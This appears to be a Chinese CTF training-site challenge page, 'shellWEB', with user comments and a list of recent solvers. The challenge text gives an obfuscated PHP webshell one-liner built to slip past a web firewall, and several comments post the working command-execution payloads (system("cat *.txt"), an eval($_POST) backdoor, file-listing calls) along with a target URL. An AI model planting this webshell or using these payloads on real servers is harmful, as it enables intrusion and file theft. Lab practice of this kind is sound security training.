shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6070
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
eleven 3年前

?s=system("cat *.txt")

回复 0

naihe567 3年前

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1

mantou 3年前

http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)

回复 0

Y1rannn 4年前

...没那么复杂啊,我直接s=system("")

回复 3

pest 4年前

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0

simpleboy 4年前

解法还是很多的

回复 0

simpleboy 4年前

命令执行了

回复 0

三分踯躅 4年前

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0

GGBond9527 4年前

assert()代码执行漏洞

回复 1

xiaotan451 4年前

我是肖彪

回复 3
xiaotan451 4年前

@biaoxiao 我是流汗了

回复 0

biaoxiao 4年前

嗯 你说得对

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

testda 攻破了该题 1小时前
Cyyyyg 攻破了该题 3小时前
goeasy 攻破了该题 5小时前
867736371 攻破了该题 6小时前
废柴小白 攻破了该题 6小时前
19893123836 攻破了该题 6小时前
baza 攻破了该题 17小时前
qwerfsafafa 攻破了该题 23小时前
Hehe0619 攻破了该题 1天前
ahco 攻破了该题 1天前
17335918325 攻破了该题 1天前
17365797718 攻破了该题 2天前
afanda 攻破了该题 2天前
zhouzehui57 攻破了该题 2天前
小白ctf 攻破了该题 3天前
rufeii 攻破了该题 3天前
qwerasdz 攻破了该题 3天前
awuawu 攻破了该题 3天前
dwx1583 攻破了该题 4天前
人闲桂花落 攻破了该题 4天前
问题反馈